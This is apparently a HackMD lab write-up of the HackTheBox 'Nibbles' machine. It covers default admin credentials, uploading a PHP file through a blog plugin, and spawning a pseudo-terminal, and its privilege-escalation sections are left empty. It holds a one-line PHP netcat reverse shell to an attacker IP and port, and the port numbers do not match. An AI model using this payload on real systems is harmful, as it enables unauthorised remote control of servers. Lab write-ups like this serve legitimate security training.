# Enumeration  # Web Footprinting       => username : admin password : nibbles   # Initial Foothold ### 1. Use Metasploit     - local host => ifconfig => tun0(VPN IP)   - shell => Create shell - `python3 -c 'import pty; pty.spawn("/bin/bash")'` => Spawn a pseudo-terminal  ### 2. Use Reverse Shell   - Bash reverse shell one-liner (PHP script) - `<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.18 8433 >/tmp/f"); ?>` - 10.10.16.18 => AttackING IP - 8843 => Listening port  - Start a netcat listener  => username : admin password : nibbles  - Plugins => My images => Configure  - Choose File => image.php => Save changes  - Check whether image.php is uploaded successful  - Execute the reverse shell  - Check the netcat listener  - `python3 -c 'import pty; pty.spawn("/bin/bash")'` => Spawn a pseudo-terminal  # Privilege Escalation ### 1. Use Metasploit       ### 2. Use Reverse Shell        
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up